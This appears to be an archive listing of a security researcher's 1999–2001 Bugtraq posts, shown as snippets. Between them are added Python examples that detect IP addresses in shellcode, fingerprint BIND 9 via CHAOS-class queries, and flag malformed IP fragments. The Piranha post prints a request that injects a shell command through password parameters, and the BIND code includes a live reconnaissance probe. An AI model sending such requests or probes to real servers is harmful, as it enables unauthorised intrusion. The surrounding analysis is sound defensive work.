Re: That BIND8 "exploit" attacks NAI

2001-02-01 Thread Max Vision
Although that is a great idea in general, it would not have helped in this case. The ruse was very well hidden and ASCII inspection would not have revealed the nai.com address. I think forums like Bugtraq *should* post exploit code that is submitted, so that other experts in the community co

Re: That BIND8 "exploit" attacks NAI

2001-02-01 Thread Max Vision
and step away from the Internet! Max >Date: Wed, 31 Jan 2001 20:57:54 -0800 >To: [EMAIL PROTECTED] >From: Max Vision <[EMAIL PROTECTED]> >Subject: That BIND8 "exploit" attacks NAI > >Hi, > >Please beware of running code such as this. It will do its best t

That BIND8 "exploit" attacks NAI

2001-02-01 Thread Max Vision
Hi, Please beware of running code such as this. It will do its best to attack NAI's nameserver. It's a typical, though well disguised, shellcode trick. Look in the Linux shellcode: \xa1\x45\x03\x96 == 161.69.3.150 == dns1.nai.com More details after I have a better look... Max At 04:12 PM 1
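The check the post describes, as an added example that is not part of the post or of the code it warns about: sweep a shellcode blob for four-byte windows that decode to a routable IPv4 address, and, more precisely, for the x86 "push imm32 / pushw imm16" pattern a connect() stub uses to build a sockaddr_in on the stack. Only the four address bytes (\xa1\x45\x03\x96) come from the post; the rest of SAMPLE_SHELLCODE is constructed filler for this example, not the exploit in question.

```python
import ipaddress
import re
import struct
from typing import Dict, List, Tuple

# Constructed sample for this example. The address bytes a1 45 03 96 are the
# ones quoted in the post; every other byte is made-up filler and does nothing.
SAMPLE_SHELLCODE = (
    b"\x31\xc0\x31\xdb\x31\xc9\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02"
    b"\x89\xe1\xcd\x80\x89\xc6"
    b"\x68\xa1\x45\x03\x96"      # push 0xa1450396 -> sin_addr = 161.69.3.150
    b"\x66\x68\x00\x35"          # pushw 0x0035   -> sin_port = 53 (network order)
    b"\x66\x6a\x02"              # pushw 2        -> sin_family = AF_INET
    b"\x89\xe1"
)


def decode_c_escapes(text: str) -> bytes:
    """Turn a C-style "\\xNN\\xNN..." string, as pasted in an exploit, into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def find_embedded_ipv4(blob: bytes, private_ok: bool = False) -> List[Tuple[int, str]]:
    """Coarse sweep: every 4-byte window that decodes to a plausible public IPv4.

    Shellcode is dense with small immediates, so this has false positives;
    it is the cheap first pass, and find_sockaddr_in() is the precise one.
    """
    hits = []
    for off in range(len(blob) - 3):
        addr = ipaddress.IPv4Address(blob[off:off + 4])
        if addr.is_unspecified or addr.is_loopback or addr.is_multicast or addr.is_reserved:
            continue
        if addr.is_private and not private_ok:
            continue
        # A first or last octet of 0 or 255 is not a host address; skip those windows.
        if blob[off] in (0, 255) or blob[off + 3] in (0, 255):
            continue
        hits.append((off, str(addr)))
    return hits


def find_sockaddr_in(blob: bytes) -> List[Dict[str, object]]:
    """Precise check: 68 <addr32> 66 68 <port16>, the push sequence that leaves a
    sockaddr_in (port in network order, then address) on the stack for connect()."""
    found = []
    for off in range(len(blob) - 8):
        if blob[off] == 0x68 and blob[off + 5:off + 7] == b"\x66\x68":
            addr = str(ipaddress.IPv4Address(blob[off + 1:off + 5]))
            port = struct.unpack("!H", blob[off + 7:off + 9])[0]
            found.append({"offset": off, "addr": addr, "port": port})
    return found


if __name__ == "__main__":
    for off, addr in find_embedded_ipv4(SAMPLE_SHELLCODE):
        print(f"candidate address at offset {off}: {addr}")
    for rec in find_sockaddr_in(SAMPLE_SHELLCODE):
        print(f"sockaddr_in built at offset {rec['offset']}: {rec['addr']}:{rec['port']}")
```

The sweep alone would have flagged 161.69.3.150 in the post's shellcode; the sockaddr_in matcher also recovers the port, which tells you what service the code is going to talk to before you run it.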

fingerprinting BIND 9.1.0

2001-01-30 Thread Max Vision
Hi, The BIND 9.1.0beta releases and now BIND 9.1.0 include another hard coded chaos record called "authors". So now even if an admin changes or suppresses their version reply string, a remote user can still determine whether the server is running BIND 9.x. With the recent discovery of the tsig
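The probe the post describes, as an added example (not code from the post or from ISC): build a CHAOS-class TXT query for authors.bind by hand, parse the TXT strings out of the reply, and decide whether the answer fingerprints BIND 9.x. The reply used offline here is constructed with build_txt_response() and its strings are made up; query_chaos() is the live UDP probe and is not run in the offline example.

```python
import socket
import struct
from typing import List

CLASS_CH = 3
TYPE_TXT = 16


def encode_name(name: str) -> bytes:
    """Wire-format name: length-prefixed labels, terminated by a zero byte."""
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_chaos_query(name: str, txid: int = 0x1234) -> bytes:
    """Standard query, RD set, one question of type TXT in class CHAOS."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", TYPE_TXT, CLASS_CH)


def build_txt_response(query: bytes, strings: List[str]) -> bytes:
    """Server side of the exchange: echo the question, answer with one TXT RR
    whose owner is a compression pointer to the question name (0xc00c).
    Used here only to construct an offline sample; the strings are made up."""
    txid = struct.unpack("!H", query[:2])[0]
    question = query[12:]
    rdata = b"".join(bytes([len(s)]) + s.encode("ascii") for s in strings)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", TYPE_TXT, CLASS_CH, 0, len(rdata)) + rdata
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    return header + question + answer


def _skip_name(pkt: bytes, off: int) -> int:
    """Advance past a name, whether written out in full or ending in a pointer."""
    while True:
        length = pkt[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:      # compression pointer: two bytes, ends the name
            return off + 2
        off += 1 + length


def parse_txt_answers(pkt: bytes) -> List[str]:
    """Return every TXT string in the answer section; other RR types are skipped."""
    _txid, _flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    off = 12
    for _ in range(qd):
        off = _skip_name(pkt, off) + 4          # qtype + qclass
    strings: List[str] = []
    for _ in range(an):
        off = _skip_name(pkt, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        if rtype == TYPE_TXT:
            i = 0
            while i < len(rdata):
                n = rdata[i]
                strings.append(rdata[i + 1:i + 1 + n].decode("ascii", "replace"))
                i += 1 + n
    return strings


def rcode(pkt: bytes) -> int:
    return struct.unpack("!H", pkt[2:4])[0] & 0x000F


def looks_like_bind9(authors_strings: List[str], authors_rcode: int) -> bool:
    """The post's point: BIND 9.1.0 answers authors.bind/CH/TXT whatever the admin
    did to version.bind, so a non-empty answer here is a BIND 9.x tell."""
    return authors_rcode == 0 and len(authors_strings) > 0


def query_chaos(server: str, name: str, timeout: float = 2.0) -> bytes:
    """Live probe over UDP/53 (not exercised offline); returns the raw reply."""
    q = build_chaos_query(name)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(q, (server, 53))
        reply, _ = s.recvfrom(4096)
    if reply[:2] != q[:2]:
        raise ValueError("transaction id mismatch")
    return reply


SAMPLE_QUERY = build_chaos_query("authors.bind")
SAMPLE_REPLY = build_txt_response(SAMPLE_QUERY, ["constructed author 1", "constructed author 2"])
```

Against a live server the same call with "version.bind" shows whether the admin changed the version string; if that is blank or fake but authors.bind still answers, the server has told you its major version anyway.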

Re: ZoneAlarm

2000-04-26 Thread Max Vision
On Mon, 24 Apr 2000, Alfred Huger wrote: > >Additionally, using nmap's -f flag allows you to send traffic past > >ZoneAlarm without any alerts. > > I set up a copy on a local machine here and while I found that source port > scans from 67 slipped past the firewall -f seemed to be alerted on just >

piranha default password/exploit

2000-04-25 Thread Max Vision
piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT Fix is available for x86 RH 6.2 users at ftp://updates.redhat.com/6.2/i386/piranha-gui-0.4.13-1.i386.rpm -- Max Vision Network Security<[EMAIL PROTEC

Re: Analysis of the Shaft distributed denial of service tool

2000-03-20 Thread Max Vision
d to quickly test your browsing system for this configuration of Shaft, as well as Trinoo, TFN, Stacheldraht, Stacheldraht4, and WinTrinoo. The self-scan tools can be found at: http://dev.whitehats.com/scan/ddos/ I have also collected related DDOS tools, media commentary, and a small forum f

Re: Advisory Update: ServerIron TCP/IP predictability fixed

2000-03-20 Thread Max Vision
elease (R4.5.2), the sequence number vulnerability still exists. http://bebugs.be.com/devbugs/detail.php3?oid=1437472 http://bebugs.be.com/devbugs/detail.php3?oid=616 Poor ISN generation is an outstanding issue for BeOS. Max Vision http://whitehats.com/

Re: unused bit attack alert

2000-02-24 Thread Max Vision
om my very limited portscan tests? On Wed, 23 Feb 2000, Max Vision wrote: > You might want to strip R_URG as well, since per RFC 793 you can set the > URG flag on packets with minimal effect to state. > ... > > Max > > -- > Max Vision Network Security<[EM

Re: unused bit attack alert

2000-02-23 Thread Max Vision
'm speculating that this would result in a valid exchange that would subvert certain common IDS. Max -- Max Vision Network Security<[EMAIL PROTECTED]> Network Security Assessment http://maxvision.net/ 100% Success Rate : Penetration Testing & Risk Mitigation Free Visibility Analysis and Price Quote for Your Network

Re: Bypass Virus Checking

2000-02-05 Thread Max Vision
FYI, I have since discovered that Symantec has removed *all* default exclusions in their Norton AntiVirus 7.0 (corporate edition). Gone are the RECYCLED folder, the windows executables, and the wildcard exclusions. Nice default. It looks like they have addressed this bug. Program Version: 7.

Re: Bypass Virus Checking

2000-02-01 Thread Max Vision
stripping "immunization" headers/footers, or even xor!@# I'm not sure defense has come very far since then. Be careful what you download and run! Max Vision http://whitehats.com/ http://maxvision.net/

Re: Anyone can take over virtually any domain on the net...

2000-01-17 Thread Max Vision
Hi, Someone tried this on one of my domains a few weeks ago, and I wrote up a brief account of the incident, showed some of the technical details of the actual attack, and described how admins should upgrade their Guardian authentication settings with Internic if they haven't already done so. Inter

Phorum 3.0.7 exploits and IDS signatures

2000-01-07 Thread Max Vision
website, http://www.phorum.org/ [direct link: http://www.phorum.org/downloads/phorum308.tar.gz ] 3.0.8 Change Log -- fixed SQL security bug in read.php3. Violation page no longer sends emails. Removed built-in security from admin as it was inadequate. admin.php33 and upgrade.php33 are disabled by default. Removed code.php33. Commented out backdoor from auth.php33. Max Vision http://whitehats.com/ http://maxvision.net/

Re: Netscape FastTrack httpd remote exploit

1999-12-31 Thread Max Vision
also available as part of http://dev.whitehats.com/ids/vision.conf Note that each record includes packet traces from usage of an actual exploit attempt. Max Vision http://whitehats.com/ <- free tools, forums, IDS database http://maxvision.net/ On Fri, 31 Dec 1999, Brock Tellier wr

Re: Analysis of "stacheldraht" + arachNIDS

1999-12-31 Thread Max Vision
s a resource to help network and security administrators by offering free software and community support. This site features the world's first open Intrusion Detection database, arachNIDS." Max Vision Network Security Architect http://whitehats.com/ <- free tools, forums, and IDS database http://maxvision.net/

Netscape 4.x buffer overflow

1999-10-19 Thread Max Vision
ey length" with "dynamic fonts" and it is equally valid. For more information and a sample exploit see http://www.whitehats.com/browsers/maxvisioncrash47/index.html ] Max Vision On Fri, 15 Oct 1999, Michael Breuer wrote: > I have found a buffer overflow in Netscape Communicator proba

Re: MW

1999-09-21 Thread Max Vision
Hello, I posted two short write-ups on recent Internet worms I've seen in the wild (ADMw0rm and Millennium Worm). http://whitehats.com/worms/. From these previous posts it looks like someone has launched a variation of the Millennium Worm. Max Vision At 05:23 PM 9/7/1999 +0200, Adam Mor

Exploit: Serv-U Ver2.5 FTPd Win9x/NT

1999-09-10 Thread Max Vision
Hi, "Version 2.5a Released 5 May 1999 * Fixed bug introduced in v2.5 causing crashes with long paths in FTP commands." Upgrade is available at http://www.ftpserv-u.com/. Original thread: http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-04-28&[EMAIL PROT

Re: FW: DCOM attack against NT using VB6

1999-08-21 Thread Max Vision
omise technique? Required reading: Understanding the DCOM Wire Protocol by Analyzing Network Data Packets http://www.guyeddon.com/MSJ3-98.htm Using Distributed COM with Firewalls http://www.iapetus.com/dcom/dcomfw.htm Max Vision http://maxvision.net/ On Wed, 18 Aug 1999, Hargett, Matt wrote:

credit (was Re: About IGMP and another exploit for Windows95x/98x)

1999-07-15 Thread Max Vision
's code is out of control here :) FYI, tcpdump of an attack from any of them: SOURCE > TARGET: icmp: parameter problem - octet 0 (frag 1234:9@0+) SOURCE > TARGET: (frag 1234:16@8+) This attack does not seem to affect Win98SE (4.10.A) nor Win2000 (5.00.2072). Max Vision Senior Security Architect Globalstar L.P.
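The two tcpdump lines quoted above say what is wrong with the datagram once you read them as fragment descriptors: "9@0+" is a non-final fragment whose length is not a multiple of 8, and "16@8+" starts one byte inside it. Added example (not from the post): a parser for tcpdump's "(frag id:len@off+)" notation that groups fragments by IP id and reports overlaps, misaligned non-final fragments and datagrams that never complete. The two id 1234 lines are the post's; the id 4321 lines are a constructed well-formed datagram for contrast.

```python
import re
from typing import Dict, List, Tuple

# tcpdump prints "(frag <id>:<payload len>@<byte offset>[+])", "+" meaning MF set.
FRAG_RE = re.compile(r"\(frag (\d+):(\d+)@(\d+)(\+?)\)")

SAMPLE_LINES = [
    # the two lines quoted in the post
    "SOURCE > TARGET: icmp: parameter problem - octet 0 (frag 1234:9@0+)",
    "SOURCE > TARGET: (frag 1234:16@8+)",
    # constructed, well-formed two-fragment datagram for comparison
    "SOURCE > TARGET: udp (frag 4321:1480@0+)",
    "SOURCE > TARGET: (frag 4321:20@1480)",
]

Frag = Tuple[int, int, bool]   # (byte offset, payload length, more_fragments)


def parse_frags(lines: List[str]) -> Dict[int, List[Frag]]:
    """Group fragments per IP id, in arrival order; lines without a frag field are ignored."""
    by_id: Dict[int, List[Frag]] = {}
    for line in lines:
        m = FRAG_RE.search(line)
        if not m:
            continue
        frag_id, length, offset, more = int(m[1]), int(m[2]), int(m[3]), m[4] == "+"
        by_id.setdefault(frag_id, []).append((offset, length, more))
    return by_id


def analyse_datagram(frags: List[Frag]) -> List[str]:
    """Findings for one id: overlaps, RFC 791 alignment violations, missing last fragment."""
    findings: List[str] = []
    ordered = sorted(frags)
    for i, (off, length, more) in enumerate(ordered):
        # Every fragment but the last carries a multiple of 8 bytes, because the
        # offset field counts in 8-byte units.
        if more and length % 8 != 0:
            findings.append(f"non-final fragment {length}@{off} is not a multiple of 8 bytes")
        if i > 0:
            poff, plen, _ = ordered[i - 1]
            if off < poff + plen:
                findings.append(f"overlap: {plen}@{poff} and {length}@{off} share {poff + plen - off} byte(s)")
    if ordered and ordered[-1][2]:
        findings.append("incomplete: no fragment with MF clear, datagram can never be reassembled")
    return findings


def analyse_all(lines: List[str]) -> Dict[int, List[str]]:
    return {frag_id: analyse_datagram(frags) for frag_id, frags in parse_frags(lines).items()}


if __name__ == "__main__":
    for frag_id, findings in analyse_all(SAMPLE_LINES).items():
        print(f"ip id {frag_id}: {'clean' if not findings else ''}")
        for f in findings:
            print(f"  {f}")
```

Run over a capture this turns the "frag 1234" pair into three concrete complaints (misaligned first fragment, a one-byte overlap, no terminating fragment), which is exactly the combination a reassembly bug in the receiving stack trips on, and it stays quiet on the well-formed id 4321 datagram.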